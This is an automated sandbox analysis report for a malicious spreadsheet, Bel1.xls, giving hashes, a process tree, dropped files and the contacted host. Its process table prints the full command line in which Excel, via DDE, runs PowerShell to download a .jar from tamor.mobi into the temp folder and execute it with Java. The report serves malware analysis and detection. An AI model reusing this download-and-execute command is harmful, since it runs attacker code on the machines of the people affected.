Field | Value |
---|---|
File name | Bel1.xls |
Full analysis | https://app.any.run/tasks/c3584f83-51fd-4bc0-9aa5-18d21e661b66 |
Verdict | Malicious activity |
Analysis date | January 22, 2019, 17:07:36 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | text/plain |
File info | ASCII text, with very long lines, with CRLF line terminators |
MD5 | 063E29A61BC44440F184591C9E8F66AA |
SHA1 | 4ABD7D99CA5F560766AFA3B2F6A72CC917593891 |
SHA256 | 05050073506003FEE0E35F84C064203B972EB58873582A5CEDF4982CB20D43D0 |
SSDEEP | 1536:Iuuuq3QoQQFVxxulLhRRRXAAEllutjTL/qSeLzzzQmmsuuuHrrtooY:mQoQQFVxxv3utT/5rr8 |
PID | CMD | Path | Indicators | Parent process | Process details |
---|---|---|---|---|---|
2948 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
3716 | CMD.EXE /c powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://tamor.mobi\" ,\" %temp%\\2NWKwq.jar\") }" & %temp%\\2NWKwq.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2256 | powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://tamor.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\2NWKwq.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3484 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\2NWKwq.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | CMD.EXE | User: admin; Company: Oracle Corporation; Integrity Level: MEDIUM; Description: Java(TM) Platform SE binary; Version: 8.0.920.14 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2948 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A34.tmp.cvr | — | — | — |
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XV67XHUHF7QNN1S2YDMG.temp | — | — | — |
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24ac9c.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
2256 | powershell.exe | C:\Users\admin\AppData\Local\Temp\2NWKwq.jar | text | 13325E5793A9E1CDFD7374D1B2B6B535 | AF42F553D04333B4ECCA0182DAEB242229668696EA0211F8C4D88F6608A1760F |
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\DESKTOP.INI | ini | 466AFDBDD30770A1A6B47AFD85099E82 | D63E228A2173E58FA14818AAF610E9E6676D2D9836C5C2ED83BA6A783B7BB999 |
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\+Connect to New Data Source.odc | html | 16A8A9A2B0A8B65FAF28E1007DB6733F | 3A13080059292811E5AC3F9E8B04B2C8EEA95D6A5538116AD751D11C834E6056 |
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\+NewSQLServerConnection.odc | html | 149E8C684B9EA9887DD2E7E596E7187C | 43B12E68FB3B5BCC4099D796FA670A62B116A894437454A20050661DEF9D8816 |
2948 | EXCEL.EXE | C:\Users\admin\Documents\My Data Sources\FOLDER.ICO | image | A6DDCCFDAD18D5CA7AAEB168B6D02253 | 3114451F95C7FB8D7D884A19C724F6C7FF906B6D9BEC1BF7C6300D2CCA4F43A6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2256 | powershell.exe | GET | 200 | 94.23.170.118:80 | http://tamor.mobi/ | CZ | text | 92 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2256 | powershell.exe | 94.23.170.118:80 | tamor.mobi | OVH SAS | CZ | suspicious |
Domain | IP | Reputation |
---|---|---|
tamor.mobi | | unknown |